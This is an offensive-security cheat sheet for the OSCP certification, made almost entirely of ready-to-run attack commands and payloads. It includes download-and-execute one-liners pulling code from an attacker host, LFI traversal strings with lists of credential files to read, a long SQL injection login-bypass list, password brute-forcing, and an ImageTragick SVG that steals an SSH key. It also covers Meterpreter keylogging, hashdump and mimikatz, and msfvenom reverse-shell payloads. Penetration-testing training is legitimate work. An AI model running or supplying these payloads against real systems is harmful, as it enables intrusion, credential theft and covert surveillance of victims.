Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
DISCLAIMER: A guy on Twitter got a point. Automatic exploitation tools like sqlmap
are prohibited to use in the exam. The same goes for the automatic exploitation functionality of LinPEAS
. I am not keeping track of current guidelines related to those tools. For that i want to point out that i am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam. Inform yourself before taking the exam!
I removed sqlmap
because of the reasons above but Metasploit
is still part of the guide because you can use it for one specific module. Thank you Muztahidul Tanim
for making me aware and to yeep for the resources.
Here are the link to the OSCP Exam Guide and the discussion about LinPEAS . I hope this helps.
doas - u < USERNAME > /bin /sh
certutil - urlcache - split - f "http://<LHOST>/<FILE>" < FILE >
./chisel server - p 9002 - reverse - v
./chisel client < RHOST > :9002 R:9003 :127.0 .0.1 :8888
gcc (-- static ) - m32 - Wl ,-- hash - style = both exploit .c - o exploit
i686 - w64 - mingw32 - gcc - o main32 .exe main .c
x86_64 - w64 - mingw32 - gcc - o main64 .exe main .c
nc - lnvp < LPORT > < < FILE >
nc < RHOST > < RPORT > > < FILE >
ping - c 1 < RHOST >
ping - n 1 < RHOST >
sudo python - m SimpleHTTPServer 80
sudo python3 - m http .server 80
xfreerdp /v :< RHOST > /u :< USERNAME > /p :< PASSWORD > + clipboard
rdesktop < RHOST >
ssh user @< RHOST > - oKexAlgorithms = + diffie - hellman - group1 - sha1
ssh - R 8080 :< LHOST > :80 < RHOST >
ssh - L 8000 :127.0 .0.1 :8000 < USERNAME > @< RHOST >
ssh - N - L 1234 :127.0 .0.1 :1234 < USERNAME > @< RHOST >
ssh - L 80 :< LHOST > :80 < RHOST >
ssh - L 127.0 .0 .1 :80 :< LHOST > :80 < RHOST >
ssh - L 80 :localhost :80 < RHOST >
ctrl b + w # show windows
ctrl + " # split window horizontal
ctrl + % # split window vertical
ctrl + , # rename window
ctrl + { # flip window
ctrl + } # flip window
ctrl + spacebar # switch pane layout
Copy & Paste
:setw - g mode - keys vi
1. ctrl b + [
2. space
3. enter
4. ctrl b + ]
Search
ctrl b + [ # enter copy
ctrl + / # enter search while within copy mode for vi mode
n # search next
shift + n # reverse search
python - c 'import pty ;pty .spawn ("/bin/bash" )'
python3 - c 'import pty ;pty .spawn ("/bin/bash" )'
ctrl + z
stty raw - echo
fg
Enter
Enter
export XTERM = xterm
:w !sudo tee % # save file with elevated privileges without exiting
Windows Command Formatting
echo "< COMMAND > " | iconv -f UTF-8 -t UTF-16LE | base64 -w0
sudo nmap - A - T4 - p - - sS - sV - oN initial -- script discovery < RHOST > # discovery scan
sudo nmap - A - T4 - sC - sV -- script vuln < RHOST > # vulnerability scan
sudo nmap - sU < RHOST > # udp scan
sudo nmap - sC - sV - p - -- scan - delay 5 s < RHOST > # delayed scan
sudo nmap $TARGET - p 88 -- script krb5 - enum - users -- script - args krb5 - enum - users .realm = 'test ' < RHOST > # kerberos enumeration
ls - lh /usr /share /nmap /scripts /* ssh *
locate - r '\.nse $' | xargs grep categories | grep categories | grep 'default \|version \|safe ' | grep smb
whois < RHOST >
host < RHOST > < RHOST >
host - l < RHOST > < RHOST >
dig @< RHOST > - x < RHOST >
dig {a |txt |ns |mx } < RHOST >
dig {a |txt |ns |mx } < RHOST > @ns1 .< RHOST >
dig axfr @< RHOST > < RHOST > # zone transfer
ldapsearch - x - w < PASSWORD >
ldapsearch - x - h < RHOST > - s base namingcontexts
ldapsearch - x - b "dc=<RHOST>,dc=local" "*" - h < RHOST > | awk '/dn : / {print $2 }'
ldapsearch - x - D "cn=admin,dc=<RHOST>,dc=local" - s sub "cn=*" - h < RHOST > | awk '/uid : /{print $2 }' | nl
ldapsearch - D "cn=admin,dc=acme,dc=com" "(objectClass=*)" - w ldapadmin - h ldap .acme .com
ldapsearch - x - h < RHOST > - D "< USERNAME > " -b " dc = < RHOST > ,dc = local " "(ms-MCS-AdmPwd=*)" ms - MCS - AdmPwd
sslyze -- heartbleed < RHOST >
nbtscan < RHOST >
enum4linux - a < RHOST >
IEX (New - Object Net .webclient ).downloadString ('http ://<LHOST>:<LPORT>/jaws-enum.ps1')
./finger - user - enum .pl - U /usr /share /seclists /Usernames /Names /names .txt - t < RHOST >
curl - s - k "https://jldc.me/anubis/subdomains/example.com" | grep - Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d '
ffuf - w /usr /share /wordlists /dirb /common .txt - u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf - c - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf - c - w /usr /share /wordlists /seclists /Fuzzing /4 - digits - 0000 - 9999. txt - u http://<RHOST>/backups/backup_2020070416FUZZ.zip
ffuf - u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
ffuf - w /usr /share /wordlists /seclists /Fuzzing /LFI /LFI - Jhaddix .txt - u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
Fuzzing with PHP Session ID
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - small .txt - u "http://<RHOST>/admin/FUZZ.php" - b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" - fw 2644
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http://<RHOST>/cd/basic/FUZZ -recursion
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http://<RHOST>/cd/ext/logs/FUZZ -e .log
No 404 Header
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http://<RHOST>/cd/no404/FUZZ -fs 669
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - u http://<RHOST>/cd/param/data?FUZZ=1
ffuf - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - 2.3 - small .txt - t 5 - p 0.1 - u http://<RHOST>/cd/rate/FUZZ -mc 200,429
seq 1 1000 | ffuf - w - - u http://<RHOST>/cd/pipes/user?id=FUZZ
#!/bin /bash
while read i
do
if [ "$1" == "md5" ]; then
echo - n $i | md5sum | awk '{ print $1 }'
elif [ "$1" == "b64" ]; then
echo - n $i | base64
else
echo $i
fi
done
Use Script above for Base64 decoding
seq 1 1000 | /usr /local /bin /hashit b64 | ffuf - w - - u http://<RHOST>/cd/pipes/user2?id=FUZZ
MD5 Discovery using the Script
seq 1 1000 | /usr /local /bin /hashit md5 | ffuf - w - - u http://<RHOST>/cd/pipes/user3?id=FUZZ
ffuf - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 5000. txt - H "Host: FUZZ.<RHOST>" - u http://<RHOST> -fs 1495
Massive File Extension Discovery
ffuf - w /opt /seclists /Discovery /Web - Content /directory - list - 1.0 .txt - u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
- e // extended mode that renders the full url
- k // skip ssl certificate validation
- r // follow cedirects
- s // status codes
- b // exclude status codes
- k // ignore certificates
-- wildcard // set wildcard option
$ gobuster dir - w /usr /share /wordlists /dirbuster /directory - list - 2.3 - medium .txt - u http://<RHOST>/
$ gobuster dir - w /usr /share /seclists /Discovery /Web - Content /big .txt - u http://<RHOST>/ -x php
$ gobuster dir - w /usr /share /wordlists /dirb /big .txt - u http://<RHOST>/ -x php,txt,html,js -e -s 200
$ gobuster dir - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - medium .txt - u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard
txt ,bak ,php ,html ,js ,asp ,aspx
Common Picture Extensions
gobuster dir - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - medium .txt - u http://<RHOST>/api/ -e -s 200
gobuster dns - d < RHOST > - t 50 - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt
gobuster vhost - u < RHOST > - t 50 - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt
gobuster dir - w /usr /share /wordlists /dirbuster /directory - list - 2.3 - medium .txt - u http://<RHOST>/ -a Linux
Local File Inclusion (LFI)
http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00
Encoded Traversal Strings
../
..\
..\/
%2e %2e %2f
%252e %252e %252f
%c0 %ae %c0 %ae %c0 %af
%uff0e %uff0e %u2215
%uff0e %uff0e %u2216
..././
...\.\
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 - d < FILE > .php
/etc /passwd
/etc /shadow
/etc /aliases
/etc /anacrontab
/etc /apache2 /apache2 .conf
/etc /apache2 /httpd .conf
/etc /apache2 /sites - enabled /000 - default .conf
/etc /at .allow
/etc /at .deny
/etc /bashrc
/etc /bootptab
/etc /chrootUsers
/etc /chttp .conf
/etc /cron .allow
/etc /cron .deny
/etc /crontab
/etc /cups /cupsd .conf
/etc /exports
/etc /fstab
/etc /ftpaccess
/etc /ftpchroot
/etc /ftphosts
/etc /groups
/etc /grub .conf
/etc /hosts
/etc /hosts .allow
/etc /hosts .deny
/etc /httpd /access .conf
/etc /httpd /conf /httpd .conf
/etc /httpd /httpd .conf
/etc /httpd /logs /access_log
/etc /httpd /logs /access .log
/etc /httpd /logs /error_log
/etc /httpd /logs /error .log
/etc /httpd /php .ini
/etc /httpd /srm .conf
/etc /inetd .conf
/etc /inittab
/etc /issue
/etc /lighttpd .conf
/etc /lilo .conf
/etc /logrotate .d /ftp
/etc /logrotate .d /proftpd
/etc /logrotate .d /vsftpd .log
/etc /lsb - release
/etc /motd
/etc /modules .conf
/etc /motd
/etc /mtab
/etc /my .cnf
/etc /my .conf
/etc /mysql /my .cnf
/etc /network /interfaces
/etc /networks
/etc /npasswd
/etc /passwd
/etc /php4 .4 /fcgi /php .ini
/etc /php4 /apache2 /php .ini
/etc /php4 /apache /php .ini
/etc /php4 /cgi /php .ini
/etc /php4 /apache2 /php .ini
/etc /php5 /apache2 /php .ini
/etc /php5 /apache /php .ini
/etc /php /apache2 /php .ini
/etc /php /apache /php .ini
/etc /php /cgi /php .ini
/etc /php .ini
/etc /php /php4 /php .ini
/etc /php /php .ini
/etc /printcap
/etc /profile
/etc /proftp .conf
/etc /proftpd /proftpd .conf
/etc /pure - ftpd .conf
/etc /pureftpd .passwd
/etc /pureftpd .pdb
/etc /pure - ftpd /pure - ftpd .conf
/etc /pure - ftpd /pure - ftpd .pdb
/etc /pure - ftpd /putreftpd .pdb
/etc /redhat - release
/etc /resolv .conf
/etc /samba /smb .conf
/etc /snmpd .conf
/etc /ssh /ssh_config
/etc /ssh /sshd_config
/etc /ssh /ssh_host_dsa_key
/etc /ssh /ssh_host_dsa_key .pub
/etc /ssh /ssh_host_key
/etc /ssh /ssh_host_key .pub
/etc /sysconfig /network
/etc /syslog .conf
/etc /termcap
/etc /vhcs2 /proftpd /proftpd .conf
/etc /vsftpd .chroot_list
/etc /vsftpd .conf
/etc /vsftpd /vsftpd .conf
/etc /wu - ftpd /ftpaccess
/etc /wu - ftpd /ftphosts
/etc /wu - ftpd /ftpusers
/logs /pure - ftpd .log
/logs /security_debug_log
/logs /security_log
/opt /lampp /etc /httpd .conf
/opt /xampp /etc /php .ini
/proc /cpuinfo
/proc /filesystems
/proc /interrupts
/proc /ioports
/proc /meminfo
/proc /modules
/proc /mounts
/proc /< PID > /cmdline
/proc /< PID > /maps
/proc /stat
/proc /swaps
/proc /version
/proc /self /net /arp
/proc /self /cwd /app .py
/proc /sched_debug
/proc /net /arp
/proc /net /tcp
/proc /net /udp
/root /anaconda - ks .cfg
/usr /etc /pure - ftpd .conf
/usr /lib /php .ini
/usr /lib /php /php .ini
/usr /local /apache /conf /modsec .conf
/usr /local /apache /conf /php .ini
/usr /local /apache /log
/usr /local /apache /logs
/usr /local /apache /logs /access_log
/usr /local /apache /logs /access .log
/usr /local /apache /audit_log
/usr /local /apache /error_log
/usr /local /apache /error .log
/usr /local /cpanel /logs
/usr /local /cpanel /logs /access_log
/usr /local /cpanel /logs /error_log
/usr /local /cpanel /logs /license_log
/usr /local /cpanel /logs /login_log
/usr /local /cpanel /logs /stats_log
/usr /local /etc /httpd /logs /access_log
/usr /local /etc /httpd /logs /error_log
/usr /local /etc /php .ini
/usr /local /etc /pure - ftpd .conf
/usr /local /etc /pureftpd .pdb
/usr /local /lib /php .ini
/usr /local /php4 /httpd .conf
/usr /local /php4 /httpd .conf .php
/usr /local /php4 /lib /php .ini
/usr /local /php5 /httpd .conf
/usr /local /php5 /httpd .conf .php
/usr /local /php5 /lib /php .ini
/usr /local /php /httpd .conf
/usr /local /php /httpd .conf .ini
/usr /local /php /lib /php .ini
/usr /local /pureftpd /etc /pure - ftpd .conf
/usr /local /pureftpd /etc /pureftpd .pdn
/usr /local /pureftpd /sbin /pure - config .pl
/usr /local /www /logs /httpd_log
/usr /local /Zend /etc /php .ini
/usr /sbin /pure - config .pl
/var /adm /log /xferlog
/var /apache2 /config .inc
/var /apache /logs /access_log
/var /apache /logs /error_log
/var /cpanel /cpanel .config
/var /lib /mysql /my .cnf
/var /lib /mysql /mysql /user .MYD
/var /local /www /conf /php .ini
/var /log /apache2 /access_log
/var /log /apache2 /access .log
/var /log /apache2 /error_log
/var /log /apache2 /error .log
/var /log /apache /access_log
/var /log /apache /access .log
/var /log /apache /error_log
/var /log /apache /error .log
/var /log /apache - ssl /access .log
/var /log /apache - ssl /error .log
/var /log /auth .log
/var /log /boot
/var /htmp
/var /log /chttp .log
/var /log /cups /error .log
/var /log /daemon .log
/var /log /debug
/var /log /dmesg
/var /log /dpkg .log
/var /log /exim_mainlog
/var /log /exim /mainlog
/var /log /exim_paniclog
/var /log /exim .paniclog
/var /log /exim_rejectlog
/var /log /exim /rejectlog
/var /log /faillog
/var /log /ftplog
/var /log /ftp - proxy
/var /log /ftp - proxy /ftp - proxy .log
/var /log /httpd - access .log
/var /log /httpd /access_log
/var /log /httpd /access .log
/var /log /httpd /error_log
/var /log /httpd /error .log
/var /log /httpsd /ssl .access_log
/var /log /httpsd /ssl_log
/var /log /kern .log
/var /log /lastlog
/var /log /lighttpd /access .log
/var /log /lighttpd /error .log
/var /log /lighttpd /lighttpd .access .log
/var /log /lighttpd /lighttpd .error .log
/var /log /mail .info
/var /log /mail .log
/var /log /maillog
/var /log /mail .warn
/var /log /message
/var /log /messages
/var /log /mysqlderror .log
/var /log /mysql .log
/var /log /mysql /mysql - bin .log
/var /log /mysql /mysql .log
/var /log /mysql /mysql - slow .log
/var /log /proftpd
/var /log /pureftpd .log
/var /log /pure - ftpd /pure - ftpd .log
/var /log /secure
/var /log /vsftpd .log
/var /log /wtmp
/var /log /xferlog
/var /log /yum .log
/var /mysql .log
/var /run /utmp
/var /spool /cron /crontabs /root
/var /webmin /miniserv .log
/var /www /< vhost > /__init__ .py
/var /www /log /access_log
/var /www /log /error_log
/var /www /logs /access_log
/var /www /logs /error_log
/var /www /logs /access .log
/var /www /logs /error .log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh /authorized_keys
~/.ssh /id_dsa
~/.ssh /id_dsa .pub
~/.ssh /id_rsa
~/.ssh /id_rsa .pub
~/.ssh /identity
~/.ssh /identity .pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
C:/Users /Administrator /NTUser .dat
C :/Documents and Settings /Administrator /NTUser .dat
C :/apache /logs /access .log
C :/apache /logs /error .log
C :/apache /php /php .ini
C:/boot .ini
C :/inetpub /wwwroot /global .asa
C :/MySQL /data /hostname .err
C :/MySQL /data /mysql .err
C :/MySQL /data /mysql .log
C :/MySQL /my .cnf
C :/MySQL /my .ini
C :/php4 /php .ini
C :/php5 /php .ini
C :/php /php .ini
C :/Program Files /Apache Group /Apache2 /conf /httpd .conf
C :/Program Files /Apache Group /Apache /conf /httpd .conf
C :/Program Files /Apache Group /Apache /logs /access .log
C :/Program Files /Apache Group /Apache /logs /error .log
C :/Program Files /FileZilla Server /FileZilla Server .xml
C :/Program Files /MySQL /data /hostname .err
C :/Program Files /MySQL /data /mysql - bin .log
C :/Program Files /MySQL /data /mysql .err
C :/Program Files /MySQL /data /mysql .log
C :/Program Files /MySQL /my .ini
C :/Program Files /MySQL /my .cnf
C :/Program Files /MySQL /MySQL Server 5.0 /data /hostname .err
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql - bin .log
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql .err
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql .log
C :/Program Files /MySQL /MySQL Server 5.0 /my .cnf
C :/Program Files /MySQL /MySQL Server 5.0 /my .ini
C :/Program Files (x86 )/Apache Group /Apache2 /conf /httpd .conf
C :/Program Files (x86 )/Apache Group /Apache /conf /httpd .conf
C :/Program Files (x86 )/Apache Group /Apache /conf /access .log
C :/Program Files (x86 )/Apache Group /Apache /conf /error .log
C :/Program Files (x86 )/FileZilla Server /FileZilla Server .xml
C :/Program Files (x86 )/xampp /apache /conf /httpd .conf
C :/WINDOWS /php .ini
C :/WINDOWS /Repair /SAM
C :/Windows /repair /system
C :/Windows /repair /software
C :/Windows /repair /security
C :/WINDOWS /System32 /drivers /etc /hosts
C :/Windows /win .ini
C :/WINNT /php .ini
C :/WINNT /win .ini
C :/xampp /apache /bin /php .ini
C :/xampp /apache /logs /access .log
C :/xampp /apache /logs /error .log
C :/Windows /Panther /Unattend /Unattended .xml
C :/Windows /Panther /Unattended .xml
C :/Windows /debug /NetSetup .log
C :/Windows /system32 /config /AppEvent .Evt
C :/Windows /system32 /config /SecEvent .Evt
C :/Windows /system32 /config /default .sav
C :/Windows /system32 /config /security .sav
C :/Windows /system32 /config /software .sav
C :/Windows /system32 /config /system .sav
C :/Windows /system32 /config /regback /default
C :/Windows /system32 /config /regback /sam
C :/Windows /system32 /config /regback /security
C :/Windows /system32 /config /regback /system
C :/Windows /system32 /config /regback /software
C :/Program Files /MySQL /MySQL Server 5.1 /my .ini
C :/Windows /System32 /inetsrv /config /schema /ASPNET_schema .xml
C :/Windows /System32 /inetsrv /config /applicationHost .config
C:/inetpub /logs /LogFiles /W3SVC1 /u_ex [YYMMDD ].log
wfuzz - w /usr /share /wfuzz /wordlist /general /big .txt - u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
wfuzz - w /PATH /TO /WORDLIST - c - f < FILE > - u http://<RHOST> --hc 403,404
Custom Scan with limited Output
wfuzz - w /PATH /TO /WORDLIST - u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
Fuzzing two Parameters at once
wfuzz - w /usr /share /wordlists /seclists /Discovery /Web - Content /big .txt - u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
wfuzz -- hh 0 - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 5000. txt - H 'Host : FUZZ .< RHOST > .< tld > ' - u http://<RHOST>/
wfuzz - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - H "Host: FUZZ.<RHOST>" -- hc 200 -- hw 356 - t 100 < RHOST >
wfuzz - w /usr /share /wordlists /seclists /Discovery /Web - Content /raft - medium - files - lowercase .txt - u http://<RHOST>/FUZZ --hc 403,404
wfuzz - X POST - u "http://<RHOST>:<RPORT>/login.php" - d "email=FUZZ&password=<PASSWORD>" - w /PATH /TO /WORDLIST /< WORDLIST > .txt -- hc 200 - c
wfuzz - X POST - u "http://<RHOST>:<RPORT>/login.php" - d "username=FUZZ&password=<PASSWORD>" - w /PATH /TO /WORDLIST /< WORDLIST > .txt -- ss "Invalid login"
wfuzz - c - z file ,/usr /share /wordlists /seclists /Fuzzing /SQLi /Generic - SQLi .txt - d 'db = FUZZ ' -- hl 16 http ://<RHOST>/select http
wfuzz - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - H "Origin: http://FUZZ.<RHOST>" -- filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/
wfuzz - c - w /usr /share /wordlists /secLists /Discovery /DNS /subdomains - top1million - 110000. txt -- hc 400 ,404 ,403 - H "Host: FUZZ.<RHOST>" - u http://<RHOST> -t 100
wfuzz - c - w /usr /share /wordlists /secLists /Discovery /DNS /subdomains - top1million - 110000. txt -- hc 400 ,403 ,404 - H "Host: FUZZ.<RHOST>" - u http://<RHOST> --hw <value> -t 100
wfuzz - w /usr /share /wordlists /seclists /Fuzzing /4 - digits - 0000 - 9999. txt -- hw 31 http ://10.13.37.11/backups/backup_2021052315FUZZ.zip
wfuzz - u 'http ://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000
wpscan -- url https://<RHOST> --disable-tls-checks
wpscan -- url https://<RHOST> --disable-tls-checks --enumerate u
target = < RHOST > ; wpscan -- url http ://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan -- url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
show databases ;
use < DATABASE > ;
show tables ;
SELECT * FROM * ;
mysql - u < USERNAME > - h < RHOST > - p
admin ' or '1' = '1
' or '1' = '1
" or " 1 "=" 1
" or " 1 "=" 1 "--
" or "1" = "1" /*
" or " 1 "=" 1 "#
" or 1 = 1
" or 1=1 --
" or 1 = 1 -
" or 1=1--
" or 1 = 1 /*
" or 1=1#
" or 1 = 1 -
") or " 1 "=" 1
") or " 1 "=" 1 "--
" ) or "1" = "1" /*
") or " 1 "=" 1 "#
" ) or ("1" = "1
" ) or ("1" = "1" --
") or (" 1 "=" 1 "/*
" ) or ("1" = "1" #
) or '1`= '1-
'-'
' '
'&'
'^'
'*'
' or 1 = 1 limit 1 -- - +
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-|| 0 '
"-||0"
"-"
" "
"&"
"^"
"*"
'-- '
"-- "
'-- ' / "--"
" or " "-"
" or " " "
" or " "&"
" or " "^"
" or " "*"
or true--
" or true--
' or true --
") or true--
') or true--
' or 'x' = 'x
' ) or ('x' )= ('x
' )) or (('x' ))= (('x
" or " x "=" x
") or (" x ")=(" x
")) or ((" x "))=((" x
or 2 like 2
or 1 = 1
or 1 = 1 --
or 1 = 1 #
or 1 = 1 /*
admin ' --
admin ' -- -
admin ' #
admin '/*
admin ' or '2' LIKE '1
admin ' or 2 LIKE 2 --
admin ' or 2 LIKE 2 #
admin ') or 2 LIKE 2 #
admin ') or 2 LIKE 2 --
admin ') or ('2' LIKE '2
admin ' ) or ('2' LIKE '2' #
admin ') or ('2' LIKE '2' /*
admin ' or '1' = '1
admin ' or '1' = '1' --
admin ' or ' 1 '=' 1 '#
admin ' or '1' = '1' /*
admin 'or 1 = 1 or ''='
admin ' or 1 = 1
admin ' or 1 = 1 --
admin ' or 1 = 1 #
admin ' or 1 = 1 /*
admin ') or ('1' = '1
admin ' ) or ('1' = '1' --
admin ') or ('1' = '1' #
admin ') or ('1' = '1' /*
admin ') or '1 '= '1
admin ' ) or '1 '= '1 '--
admin ') or '1 '= '1 '#
admin ') or '1 '= '1 '/*
1234 ' AND 1 = 0 UNION ALL SELECT 'admin ', ' 81 dc9bdb52d04dc20036dbd8313ed055
admin " --
admin ';-- azer
admin " #
admin " /*
admin " or " 1 "=" 1
admin " or " 1 "=" 1 "--
admin " or "1" = "1" #
admin " or " 1 "=" 1 "/*
admin "or 1 = 1 or "" = "
admin " or 1 = 1
admin " or 1=1--
admin " or 1 = 1 #
admin " or 1=1/*
admin " ) or ("1 "= "1
admin ") or ("1" = "1" --
admin ") or ("1" = "1" #
admin ") or (" 1 "=" 1 "/*
admin " ) or "1 "= "1
admin ") or "1 "= "1 "--
admin ") or "1 "= "1 "#
admin ") or "1 "= "1 "/*
1234 " AND 1=0 UNION ALL SELECT " admin ", " 81 dc9bdb52d04dc20036dbd8313ed055
sqsh - S < RHOST > - U < USERNAME >
'admin @< FQDN > ' = ' admin @< FQDN > ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ htb '
test ' or 1 = 1 or 'a' = 'a
test ' or 1 = 2 or 'a' = 'a
' or substring (Password ,1 ,1 )= 'p' or ' # checking letter "p" on the beginning of the password
'or substring (Password ,2 ,1 )= 'p' or ' # checking letter "p" on the second position of the password
fcrackzip - u - D - p /usr /share /wordlists /rockyou .txt < FILE > .zip
export HYDRA_PROXY = connect ://127.0.0.1:8080
unset HYDRA_PROXY
hydra < RHOST > http - form - post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" - l root @localhost - P otrs - cewl .txt - vV - f
hydra - l admin - P /usr /share /wordlists /rockyou .txt < RHOST > http - post - form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
/usr /share /john /ssh2john .py id_rsa > hash
john hash -- wordlist = /usr /share /wordlists /rockyou .txt < FILE >
john -- rules -- wordlist = /usr /share /wordlists /rockyou .txt < FILE >
john -- show < FILE >
ImageTragick Polyglot Attack
poc .svg
< image authenticate = 'ff " `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;" '>
< read filename = "pdf:/etc/passwd" />
< get width = "base-width" height = "base-height" />
< resize geometry = "400x400" />
< write filename = "test.png" />
< svg width = "700" height = "700" xmlns = "http://www.w3.org/2000/svg" xmlns :xlink = "http://www.w3.org/1999/xlink" >
< image xlink :href = "msl:poc.svg" height = "100" width = "100" />
< /svg >
< /image >
$ convert poc .svg poc .png
sudo msfdb init // database initialization
msf6 > search // search within metasploit
msf6 > set RHOST < RHOST > // set remote host
msf6 > set RPORT < RPORT > // set remote port
msf6 > run // run exploit
msf6 > spool /PATH /TO /FILE // recording screen output
msf6 > save // saves current state
msf6 > exploit // using module exploit
msf6 > payload // using module payload
msf6 > auxiliary // using module auxiliary
msf6 > encoder // using module encoder
msf6 > nop // using module nop
msf6 > show sessions // displays all current sessions
msf6 > sessions - i 1 // switch to session 1
msf6 > db_nmap - sC < RHOST > // using nmap
msf6 > jobs // showing all current jobs
msf6 > hosts // displaying hosts
msf6 > services // displaying services
msf6 > vulns // displaying vulnerabilities
msf6 > show payloads // displaying available payloads
msf6 > set VERBOSE true // enable verbose output
msf6 > set forceexploit true // exploits the target anyways
msf6 > use post /multi /manage /shell_to_meterpreter // shell to meterpreter
msf6 > use exploit /windows /http /oracle_event_processing_upload // use a specific module
C :\> > Ctrl + z // put active meterpreter shell in background
meterpreter > background // put meterpreter in background (same as "bg")
meterpreter > shell // get a system shell
meterpreter > channel - i < ID > // get back to existing meterpreter shell
meterpreter > ps // checking processes
meterpreter > migrate 2236 // migrate to a process
meterpreter > getuid // get the user id
meterpreter > sysinfo // get system information
meterpreter > upload // uploading local files to the target
meterpreter > ipconfig // get network configuration
meterpreter > load kiwi // load mimikatz
meterpreter > getprivs // get privileges after loading mimikatz
meterpreter > getsystem // gain system privileges if user is member of administrator group
meterpreter > hashdump // dumps all the user hashes
meterpreter > run post /windows /gather /checkvm // check status of the target
meterpreter > run post /multi /recon /local_exploit_suggester // checking for exploits
meterpreter > run post /windows /manage /enable_rdp // enables rdp
meterpreter > run post /multi /manage /autoroute // runs autoroutes
meterpreter > run auxiliary /server /socks4a // runs socks4 proxy server
meterpreter > keyscan_start // enabled keylogger
meterpreter > keyscan_dump // showing the output
meterpreter > screenshare // realtime screen sharing
meterpreter > screenshare - q 100 // realtime screen sharing
meterpreter > record_mic // recording mic output
meterpreter > timestomp // modify timestamps
meterpreter > execute - f calc .exe // starts a program on the victim
meterpreter > portfwd add - l < LPORT > - p < RPORT > - r 127.0 .0 .1 // port forwarding
Metasploit through Proxychains
proxychains - q msfconsole
Auxiliary Output Directory
/home /kali /.msf4 /loot /20200623090635 _default_ < RHOST > _nvms .traversal_680948 .txt
msfvenom - p windows /x64 /meterpreter /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - f exe - o meterpreter_payload .exe
Setup Listener for Microsoft Windows
msf6 > use exploit /multi /handler
[* ] Using configured payload generic /shell_reverse_tcp
msf6 exploit (multi /handler ) > set payload windows /x64 /meterpreter /reverse_tcp
payload = > windows /x64 /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < LHOST >
LHOST = > < LHOST >
msf6 exploit (multi /handler ) > set LPORT < LPORT >
LPORT = > < LPORT >
msf6 exploit (multi /handler ) > run
